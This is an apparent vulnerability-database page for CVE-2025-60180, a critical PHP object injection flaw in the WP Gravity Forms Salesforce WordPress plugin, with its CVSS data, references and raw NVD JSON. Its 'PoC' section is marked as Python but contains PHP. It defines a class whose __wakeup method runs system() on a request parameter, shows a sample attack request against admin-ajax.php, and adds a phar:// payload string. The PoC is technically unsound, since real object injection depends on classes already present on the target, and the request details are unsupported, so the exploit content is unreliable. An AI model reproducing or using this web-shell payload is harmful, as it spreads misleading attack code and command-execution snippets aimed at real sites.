CVE-2025-60180

Description

Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Salesforce gf-salesforce-crmperks allows Object Injection.This issue affects WP Gravity Forms Salesforce: from n/a through <= 1.5.1.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:crmperks:wp_gravity_forms_salesforce:*:*:*:*:*:wordpress:*:* - VULNERABLE

WP Gravity Forms Salesforce (gf-salesforce-crmperks) <= 1.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
// CVE-2025-60180 PoC - PHP Object Injection
// This is a conceptual proof of concept for educational purposes only

class MaliciousObject {
    public $data;
    
    public function __construct() {
        $this->data = 'malicious_payload';
    }
    
    // Magic method triggered during deserialization
    public function __wakeup() {
        // This code executes when object is unserialized
        // Attackers can execute arbitrary code here
        eval('system($_GET["cmd"]);');
    }
}

// Generate malicious serialized object
$malicious_obj = new MaliciousObject();
$serialized_payload = serialize($malicious_obj);

echo "Malicious Payload: " . $serialized_payload . "\n";

// Example HTTP request to trigger the vulnerability
// POST /wp-admin/admin-ajax.php
// action=gf_salesforce_callback&data=[MALICIOUS_SERIALIZED_PAYLOAD]

// Alternative: Phar deserialization attack
$phar_payload = 'php://filter/read=convert.base64_encode/resource=phar://malicious.phar';
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60180
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60180
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60180/
[4] VulDB https://vuldb.com/cve/CVE-2025-60180
[5] https://patchstack.com/database/Wordpress/Plugin/gf-salesforce-crmperks/vulnerability/wordpress-wp-gravity-forms-salesforce-plugin-1-5-1-php-object-injection-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60180", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:09.737", "lastModified": "2026-01-20T15:17:29.000", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in CRM Perks WP Gravity Forms Salesforce gf-salesforce-crmperks allows Object Injection.This issue affects WP Gravity Forms Salesforce: from n/a through <= 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmperks:wp_gravity_forms_salesforce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.5.2", "matchCriteriaId": "83F183EF-5BA1-49E8-AD31-2EBB9FF5D845"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-salesforce-crmperks/vulnerability/wordpress-wp-gravity-forms-salesforce-plugin-1-5-1-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}